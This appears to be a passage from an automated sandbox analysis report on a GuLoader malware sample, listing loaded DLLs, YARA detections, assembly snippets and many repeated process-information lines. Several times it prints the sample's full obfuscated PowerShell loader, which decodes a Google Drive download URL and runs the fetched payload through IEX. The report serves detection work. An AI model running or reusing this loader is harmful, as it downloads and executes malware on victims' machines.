              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: comsvcs.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cmlua.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cmutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: tem.Core.pdbY source: powershell.exe, 00000006.00000002.2493008663.00000000083B0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ystem.pdb.pdb source: powershell.exe, 00000001.00000002.2112123341.000001E57FD65000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ows\dll\System.pdb source: powershell.exe, 00000001.00000002.2112123341.000001E57FD65000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: bpdbtem.pdbw` source: powershell.exe, 00000001.00000002.2112123341.000001E57FD65000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tem.Core.pdbJ source: powershell.exe, 00000006.00000002.2493008663.00000000083B0000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Yara detected GuLoader
              Source: Yara matchFile source: 00000006.00000002.2494560682.0000000008EC2000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2494284509.00000000085E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2481228299.0000000005A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2107886450.000001E577A32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Strkest151)$global:Sagsakt204 = [System.Text.Encoding]::ASCII.GetString($Cotorture)$global:Untechnicalizes=$Sagsakt204.substring($vicarious,$Mellemskolerne)<#Sminkningernes intervalg
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Skoldkopperne170 $Preincrease $Jeffi), (Halos @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Tuberculinization = [AppDomain]::CurrentDomain.GetAssemblies(
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Karakterstyrke)), $tvrdriveren).DefineDynamicModule($Antihemagglutinin, $false).DefineType($Flippantness, $Palisado, [System.Multicast
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Strkest151)$global:Sagsakt204 = [System.Text.Encoding]::ASCII.GetString($Cotorture)$global:Untechnicalizes=$Sagsakt204.substring($vicarious,$Mellemskolerne)<#Sminkningernes intervalg
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#ubekendt Ninety Drmaatters #>;$Autoradiogramme='Stivningernes84';<#Prolonging Fibromets Verbigerative #>;$omphacite=$host.PrivateData;If ($omphacite) {$Okolehao++;}function Kolonnetypernes($aldis){$aneurin=$Drawbeam+$aldis.Length-$Okolehao;for( $Nonnormalness=5;$Nonnormalness -lt $aneurin;$Nonnormalness+=6){$Befolkningsgruppernes+=$aldis[$Nonnormalness];}$Befolkningsgruppernes;}function Sibs($Venezuelaneren){ & ($Dkstolens70) ($Venezuelaneren);}$dyingness=Kolonnetypernes 'Prom MBengtoTs bazMejeniPowwolUnc.al ettaaDurst/s,ide5Beskr.Trian0Sejrs Go f(AntepWOplseiDueurnProgrdUge aoDorsow BekrsRe ta OperaN UngdT pest Incit1Mic e0Elect.F den0Indvi;Semin ModstWVid iiF rfrn oste6L ftt4 Hy,d;Prana Photx Term6Udski4Ru id;Han s Ve jurCry,ev Kryd:b.vge1.mbry2sekst1,arad.,enry0Halmk)Breve PoelsGBe,raeStoddc Ko skRemedo Azte/Panto2Kroku0Be.be1 orle0Overg0foll.1Fjert0Ubrug1 Unba grsenF aceti Overr onaeAlgerfSub,noSlagkxAban /India1Nglep2Preob1Fulge.,etai0Staff ';$Originalfabrikken=Kolonnetypernes 'Ful ku ngueSboligeThickrSyna -SakraaSt,aagParage rapnIndskTNo,pa ';$Aphagia=Kolonnetypernes 'kara,hTvelytvarict IdeapVausys Gui :Lunch/Grans/Kitchd ,agnr PeriiG ngbvStopheFluor.A ecdgTariro Slu oOxalig Formltyphle Ho t. DanscOrgano elvbmHipli/Ev ntuHumanc unbl?KondeeKntrexMargupinteroGenrerLinjetJudge=DividdObtruoProt wFj rdnNedsal TrusoSpildaPal idJogge&F erniStrafdPrees=s.wbw1Tenni2 T,lblCoa,jzFogedUTi,syxExiteLL itnYAregeyStj rsS utanNightAA rikH OutsgPlade1 stvl2 katunitr ORu.otMSpineX owsnbTotal7Bughuut ngsESang y MisgO .amdaK ediJTotalCTangaA OvntNUnhorHPengeHAlkal ';$melaena=Kolonnetypernes ' ra l> .epo ';$Dkstolens70=Kolonnetypernes 'MarguI ShineUndelXAtoni ';$Paddehat='Culturises';$Helbredsundersoegelse='\Kanalseparationen.Gte';Sibs (Kolonnetypernes ' pee$ Agamg LagrlH.drooR ccybLgenpaSpermlAquaf:StatiT elevoTubatrHybris tieriYd.rlo BrennAktivsLydreasan efUnobsf Drjej.ombaeRect d skolrtrffei Ti.gn.angegSml re Guddn,rssa= Band$ S.reeA,parnMicasvBif.n:BaungaShi,lpH plopSongld TricaSlagbt eanaAstro+Carpi$Mell,HSo taeSqui l ForsbKla rr ylevePraecdJakiesDjvleuSennenFicindProtoeInsa rPrim,sS ldeoDegreeWleccg UdpieAi,bilind ssLittleSnobs ');Sibs (Kolonnetypernes 'Beska$Subspg Egoil rochoEk,tebAssora .ortlPint :A droKgidserRe evaSymphmTelefmMic.oe PyronVaretdL bane Flde=H nga$Jell ADemurpLogichT eera InergSttteiSpiriaPolys..ntagsheedhpArvealTr boiHjesttBe nd(Addit$M uthmomklaeFintelAgilma TetreFortan Mecha Dyre) T er ');Sibs (Kolonnetypernes ' .all[ DataNCykrmeG,nert Fib .SvrmeSStr be Sutlr ,armvHududiUdmalcKopule.lycgPTr inoFastiiCanonnForsttBrac.M BrydaContrnM teraEcholgNonadeSc rirYells]Whitt:Downc:AnkomSDojigeBist cChioluStatsrWeddii SpdbtNonsey,pkkePkontrr Spu oHegnstPro,roRaketcG.ngeoTempul.loug Burre=Outwi Vele [SejltNAvahieKommutIsopy.DatamSsv,neeSvindcMundau Cr mr Se si SubptAfvigyMtlooPOmnibrRun koFieultF mdooBjrnecAphidoLumbelTrk
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#ubekendt Ninety Drmaatters #>;$Autoradiogramme='Stivningernes84';<#Prolonging Fibromets Verbigerative #>;$omphacite=$host.PrivateData;If ($omphacite) {$Okolehao++;}function Kolonnetypernes($aldis){$aneurin=$Drawbeam+$aldis.Length-$Okolehao;for( $Nonnormalness=5;$Nonnormalness -lt $aneurin;$Nonnormalness+=6){$Befolkningsgruppernes+=$aldis[$Nonnormalness];}$Befolkningsgruppernes;}function Sibs($Venezuelaneren){ & ($Dkstolens70) ($Venezuelaneren);}$dyingness=Kolonnetypernes 'Prom MBengtoTs bazMejeniPowwolUnc.al ettaaDurst/s,ide5Beskr.Trian0Sejrs Go f(AntepWOplseiDueurnProgrdUge aoDorsow BekrsRe ta OperaN UngdT pest Incit1Mic e0Elect.F den0Indvi;Semin ModstWVid iiF rfrn oste6L ftt4 Hy,d;Prana Photx Term6Udski4Ru id;Han s Ve jurCry,ev Kryd:b.vge1.mbry2sekst1,arad.,enry0Halmk)Breve PoelsGBe,raeStoddc Ko skRemedo Azte/Panto2Kroku0Be.be1 orle0Overg0foll.1Fjert0Ubrug1 Unba grsenF aceti Overr onaeAlgerfSub,noSlagkxAban /India1Nglep2Preob1Fulge.,etai0Staff ';$Originalfabrikken=Kolonnetypernes 'Ful ku ngueSboligeThickrSyna -SakraaSt,aagParage rapnIndskTNo,pa ';$Aphagia=Kolonnetypernes 'kara,hTvelytvarict IdeapVausys Gui :Lunch/Grans/Kitchd ,agnr PeriiG ngbvStopheFluor.A ecdgTariro Slu oOxalig Formltyphle Ho t. DanscOrgano elvbmHipli/Ev ntuHumanc unbl?KondeeKntrexMargupinteroGenrerLinjetJudge=DividdObtruoProt wFj rdnNedsal TrusoSpildaPal idJogge&F erniStrafdPrees=s.wbw1Tenni2 T,lblCoa,jzFogedUTi,syxExiteLL itnYAregeyStj rsS utanNightAA rikH OutsgPlade1 stvl2 katunitr ORu.otMSpineX owsnbTotal7Bughuut ngsESang y MisgO .amdaK ediJTotalCTangaA OvntNUnhorHPengeHAlkal ';$melaena=Kolonnetypernes ' ra l> .epo ';$Dkstolens70=Kolonnetypernes 'MarguI ShineUndelXAtoni ';$Paddehat='Culturises';$Helbredsundersoegelse='\Kanalseparationen.Gte';Sibs (Kolonnetypernes ' pee$ Agamg LagrlH.drooR ccybLgenpaSpermlAquaf:StatiT elevoTubatrHybris tieriYd.rlo BrennAktivsLydreasan efUnobsf Drjej.ombaeRect d skolrtrffei Ti.gn.angegSml re Guddn,rssa= Band$ S.reeA,parnMicasvBif.n:BaungaShi,lpH plopSongld TricaSlagbt eanaAstro+Carpi$Mell,HSo taeSqui l ForsbKla rr ylevePraecdJakiesDjvleuSennenFicindProtoeInsa rPrim,sS ldeoDegreeWleccg UdpieAi,bilind ssLittleSnobs ');Sibs (Kolonnetypernes 'Beska$Subspg Egoil rochoEk,tebAssora .ortlPint :A droKgidserRe evaSymphmTelefmMic.oe PyronVaretdL bane Flde=H nga$Jell ADemurpLogichT eera InergSttteiSpiriaPolys..ntagsheedhpArvealTr boiHjesttBe nd(Addit$M uthmomklaeFintelAgilma TetreFortan Mecha Dyre) T er ');Sibs (Kolonnetypernes ' .all[ DataNCykrmeG,nert Fib .SvrmeSStr be Sutlr ,armvHududiUdmalcKopule.lycgPTr inoFastiiCanonnForsttBrac.M BrydaContrnM teraEcholgNonadeSc rirYells]Whitt:Downc:AnkomSDojigeBist cChioluStatsrWeddii SpdbtNonsey,pkkePkontrr Spu oHegnstPro,roRaketcG.ngeoTempul.loug Burre=Outwi Vele [SejltNAvahieKommutIsopy.DatamSsv,neeSvindcMundau Cr mr Se si SubptAfvigyMtlooPOmnibrRun koFieultF mdooBjrnecAphidoLumbelTrk
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#ubekendt Ninety Drmaatters #>;$Autoradiogramme='Stivningernes84';<#Prolonging Fibromets Verbigerative #>;$omphacite=$host.PrivateData;If ($omphacite) {$Okolehao++;}function Kolonnetypernes($aldis){$aneurin=$Drawbeam+$aldis.Length-$Okolehao;for( $Nonnormalness=5;$Nonnormalness -lt $aneurin;$Nonnormalness+=6){$Befolkningsgruppernes+=$aldis[$Nonnormalness];}$Befolkningsgruppernes;}function Sibs($Venezuelaneren){ & ($Dkstolens70) ($Venezuelaneren);}$dyingness=Kolonnetypernes 'Prom MBengtoTs bazMejeniPowwolUnc.al ettaaDurst/s,ide5Beskr.Trian0Sejrs Go f(AntepWOplseiDueurnProgrdUge aoDorsow BekrsRe ta OperaN UngdT pest Incit1Mic e0Elect.F den0Indvi;Semin ModstWVid iiF rfrn oste6L ftt4 Hy,d;Prana Photx Term6Udski4Ru id;Han s Ve jurCry,ev Kryd:b.vge1.mbry2sekst1,arad.,enry0Halmk)Breve PoelsGBe,raeStoddc Ko skRemedo Azte/Panto2Kroku0Be.be1 orle0Overg0foll.1Fjert0Ubrug1 Unba grsenF aceti Overr onaeAlgerfSub,noSlagkxAban /India1Nglep2Preob1Fulge.,etai0Staff ';$Originalfabrikken=Kolonnetypernes 'Ful ku ngueSboligeThickrSyna -SakraaSt,aagParage rapnIndskTNo,pa ';$Aphagia=Kolonnetypernes 'kara,hTvelytvarict IdeapVausys Gui :Lunch/Grans/Kitchd ,agnr PeriiG ngbvStopheFluor.A ecdgTariro Slu oOxalig Formltyphle Ho t. DanscOrgano elvbmHipli/Ev ntuHumanc unbl?KondeeKntrexMargupinteroGenrerLinjetJudge=DividdObtruoProt wFj rdnNedsal TrusoSpildaPal idJogge&F erniStrafdPrees=s.wbw1Tenni2 T,lblCoa,jzFogedUTi,syxExiteLL itnYAregeyStj rsS utanNightAA rikH OutsgPlade1 stvl2 katunitr ORu.otMSpineX owsnbTotal7Bughuut ngsESang y MisgO .amdaK ediJTotalCTangaA OvntNUnhorHPengeHAlkal ';$melaena=Kolonnetypernes ' ra l> .epo ';$Dkstolens70=Kolonnetypernes 'MarguI ShineUndelXAtoni ';$Paddehat='Culturises';$Helbredsundersoegelse='\Kanalseparationen.Gte';Sibs (Kolonnetypernes ' pee$ Agamg LagrlH.drooR ccybLgenpaSpermlAquaf:StatiT elevoTubatrHybris tieriYd.rlo BrennAktivsLydreasan efUnobsf Drjej.ombaeRect d skolrtrffei Ti.gn.angegSml re Guddn,rssa= Band$ S.reeA,parnMicasvBif.n:BaungaShi,lpH plopSongld TricaSlagbt eanaAstro+Carpi$Mell,HSo taeSqui l ForsbKla rr ylevePraecdJakiesDjvleuSennenFicindProtoeInsa rPrim,sS ldeoDegreeWleccg UdpieAi,bilind ssLittleSnobs ');Sibs (Kolonnetypernes 'Beska$Subspg Egoil rochoEk,tebAssora .ortlPint :A droKgidserRe evaSymphmTelefmMic.oe PyronVaretdL bane Flde=H nga$Jell ADemurpLogichT eera InergSttteiSpiriaPolys..ntagsheedhpArvealTr boiHjesttBe nd(Addit$M uthmomklaeFintelAgilma TetreFortan Mecha Dyre) T er ');Sibs (Kolonnetypernes ' .all[ DataNCykrmeG,nert Fib .SvrmeSStr be Sutlr ,armvHududiUdmalcKopule.lycgPTr inoFastiiCanonnForsttBrac.M BrydaContrnM teraEcholgNonadeSc rirYells]Whitt:Downc:AnkomSDojigeBist cChioluStatsrWeddii SpdbtNonsey,pkkePkontrr Spu oHegnstPro,roRaketcG.ngeoTempul.loug Burre=Outwi Vele [SejltNAvahieKommutIsopy.DatamSsv,neeSvindcMundau Cr mr Se si SubptAfvigyMtlooPOmnibrRun koFieultF mdooBjrnecAphidoLumbelTrkJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B685185 pushad ; iretd 1_2_00007FFD9B6852A9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B6800AD pushad ; iretd 1_2_00007FFD9B6800C1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_08D006AA push ebx; iretd 6_2_08D006B0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_08D04456 push ds; retf 6_2_08D044C5
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_08D02A73 push esi; retf 6_2_08D02A76
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_08D00C0F push es; ret 6_2_08D00C37
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_08D0262E push ebp; iretd 6_2_08D0262F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_08D02E2F pushad ; ret 6_2_08D02E30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_08D015E4 push ss; retf 6_2_08D0160E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_08D031B8 push ds; iretd 6_2_08D031BF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_08D03515 push ebx; retf 6_2_08D03516
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_03A631B8 push ds; iretd 8_2_03A631BF
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_03A615E4 push ss; retf 8_2_03A6160E
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_03A63515 push ebx; retf 8_2_03A63516
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_03A606AA push ebx; iretd 8_2_03A606B0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_03A6262E push ebp; iretd 8_2_03A6262F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_03A62E2F pushad ; ret 8_2_03A62E30
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_03A60C0F push es; ret 8_2_03A60C37
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_03A62A73 push esi; retf 8_2_03A62A76
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_03A64456 push ds; retf 8_2_03A644C5
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
